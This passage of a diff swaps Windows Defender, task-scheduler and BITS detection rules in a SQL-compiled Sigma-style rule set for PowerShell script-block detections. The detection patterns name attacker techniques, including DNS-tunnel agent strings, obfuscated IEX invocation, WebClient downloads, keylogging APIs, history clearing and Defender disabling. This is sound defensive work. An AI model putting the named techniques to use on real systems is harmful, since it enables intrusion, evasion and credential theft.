ConfigSync.ps1" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1013')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ContextInfo LIKE '%' ESCAPE '\\' AND NOT (((ContextInfo LIKE '%= powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/System32/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\')) OR (ContextInfo LIKE '%= 
C:\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe -Embedding%' ESCAPE '\\') OR (ContextInfo LIKE '%ConfigSyncRun.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\dsac.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\wsmprovhost.exe -Embedding%' ESCAPE '\\') OR ((Payload LIKE '%Update-Help%' ESCAPE '\\' OR Payload LIKE '%Failed to update Help for the module%' ESCAPE '\\'))))" ], - "filename": "win_defender_history_delete.yml" + "filename": "posh_pm_alternate_powershell_hosts.yml" }, { - "title": "Windows Defender Exploit Guard Tamper", - "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", - "status": "experimental", - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Silence.EDA Detection", + "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "status": "test", + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "author": "Alina Stepchenkova, Group-IB, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", + "attack.impact", + "attack.t1529", + "attack.g0091", + "attack.s0363" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE 
'\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" ], - "filename": "win_defender_exploit_guard_tamper.yml" + "filename": "posh_ps_apt_silence_eda.yml" }, { - "title": "LSASS Access Detected via Attack Surface Reduction", - "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "status": "experimental", - "description": "Detects Access to LSASS Process", - "author": "Markus Neis", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows 
Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_defender_alert_lsass_access.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "Windows Defender Exclusions Added", - "id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", - "status": "stable", - "description": "Detects the Setting of Windows 
Defender Exclusions", - "author": "Christian Burkard (Nextron Systems)", + "title": "DirectorySearcher Powershell Exploitation", + "id": "1f6399cf-2c80-4924-ace1-6fcff3393480", + "status": "test", + "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Administrator actions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND NewValue LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object %' ESCAPE '\\' AND ScriptBlockText LIKE '%System.DirectoryServices.DirectorySearcher%' ESCAPE '\\' AND ScriptBlockText LIKE '%.PropertiesToLoad.Add%' ESCAPE '\\' AND ScriptBlockText LIKE '%.findall()%' ESCAPE '\\' AND ScriptBlockText LIKE '%Properties.name%' ESCAPE '\\')" ], - "filename": "win_defender_exclusions.yml" + "filename": "posh_ps_directorysearcher.yml" }, { - "title": "PSExec and WMI Process Creations Block", - "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", - "status": "test", - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "author": "Bhabesh Raj", + "title": "Active Directory Computers Enumeration with Get-AdComputer", + "id": "36bed6b2-e9a0-4fff-beeb-413a92b86138", + "status": "experimental", + "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": 
[ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\')" ], - "filename": "win_defender_psexec_wmi_asr.yml" + "filename": "posh_ps_get_adcomputer.yml" }, { - "title": "Windows Defender AMSI Trigger Detected", - "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "status": "stable", - "description": "Detects triggering of AMSI by Windows Defender.", - "author": "Bhabesh Raj", + "title": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", + "id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", + "status": "experimental", + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% > %' ESCAPE '\\' OR ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" ], - "filename": "win_defender_amsi_trigger.yml" + "filename": "posh_ps_user_discovery_get_aduser.yml" }, { - "title": "Microsoft Defender Tamper Protection Trigger", - "id": "49e5bc24-8b86-49f1-b743-535f332c2856", - "status": "stable", - "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", - "author": "Bhabesh Raj, Nasreddine Bencherchali", + "title": "Clearing Windows Console History", + "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "status": "test", + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1070.003" ], "falsepositives": [ - "Administrator might try to disable defender features during testing (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) 
AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" ], - "filename": "win_defender_tamper_protection_trigger.yml" + "filename": "posh_ps_clearing_windows_console_history.yml" }, { - "title": "Windows Defender Threat Detection Disabled", - "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "status": "stable", - "description": "Detects disabling Windows Defender threat protection", - "author": "Ján Trenčanský, frack113", + "title": "Disable-WindowsOptionalFeature Command PowerShell", + "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "status": "experimental", + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Administrator actions (should be investigated)", - "Seen being triggered occasionally during Windows 8 Defender Updates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" ], - "filename": "win_defender_disabled.yml" + "filename": "posh_ps_disable_windows_optional_feature.yml" }, { - "title": "Windows Defender Threat Detected", - "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "status": "stable", - "description": "Detects all actions taken by Windows Defender malware detection engines", - "author": "Ján Trenčanský", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" ], - "filename": "win_defender_threat.yml" + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Important Scheduled Task Deleted", - "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "title": "Suspicious PowerShell Download - Powershell Script", + 
"id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", "status": "experimental", - "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "PowerShell scripts that download content from the Internet" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.DownloadFile(%' ESCAPE '\\' OR ScriptBlockText LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "win_taskscheduler_susp_schtasks_delete.yml" + "filename": "posh_ps_susp_download.yml" }, { - "title": "Scheduled Task Executed From A Suspicious Location", - "id": "424273ea-7cf8-43a6-b712-375f925e481f", - "status": "experimental", - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", - "author": 
"Nasreddine Bencherchali (Nextron Systems)", + "title": "Use Remove-Item to Delete File", + "id": "b8af5f36-1361-4ebe-9e76-e36128d947bf", + "status": "test", + "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '%HKCU:\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%HKLM:\\\\%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_execution_from_susp_locations.yml" + "filename": "posh_ps_remove_item_path.yml" }, { - "title": "Scheduled Task Executed Uncommon LOLBIN", - "id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", + "title": "Powershell Keylogging", + "id": "34f90d3c-c297-49e9-b26d-911b05a4866c", "status": "experimental", - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.collection", + 
"attack.t1056.001" ], "falsepositives": [ - "False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%\\\\calc.exe' ESCAPE '\\' OR Path LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Path LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Path LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR Path LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Path LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Path LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR (ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetAsyncKeyState%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetForegroundWindow%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml" + "filename": "posh_ps_keylogging.yml" }, { - "title": "Suspicious Task Added by Bitsadmin", - "id": "1ff315dc-2a3a-4b71-8dde-873818d25d39", + "title": "Suspicious Process Discovery With Get-Process", + "id": "af4c87ce-bdda-4215-b998-15220772e993", "status": "test", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "description": "Get the processes that are running on the local computer.", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.discovery", + "attack.t1057" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Legitimate PowerShell scripts" ], 
"level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '3' AND processPath LIKE '%\\\\bitsadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_use_bitsadmin.yml" + "filename": "posh_ps_susp_get_process.yml" }, { - "title": "Suspicious Download with BITS from Direct IP", - "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", + "title": "Add New Windows Capability - ScriptBlock", + "id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a direct IP. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. 
Notable capabilities could be \"OpenSSH\" and others.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' 
ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" - ], - "filename": "win_bits_client_direct_ip_access.yml" - }, - { - "title": "Suspicious Uncommon Download with BITS from Suspicious TLD", - "id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.execution" ], "falsepositives": [ - "Other legitimate domains used by software updaters" + "Legitimate usage of the capabilities by administartors or users. Filter accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND NOT ((RemoteName LIKE '%.com%' ESCAPE '\\' OR RemoteName LIKE '%.azureedge.net%' ESCAPE '\\' OR RemoteName LIKE '%.sfx.ms%' ESCAPE '\\' OR RemoteName LIKE '%download.mozilla.org%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-WindowsCapability %' ESCAPE '\\' AND ScriptBlockText LIKE '%OpenSSH.%' ESCAPE '\\')" ], - "filename": "win_bits_client_uncommon_domain.yml" + "filename": "posh_ps_add_windows_capability.yml" }, { - "title": "Suspicious Task Added by Powershell", - "id": "fe3a2d49-f255-4d10-935c-bda7391108eb", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through 
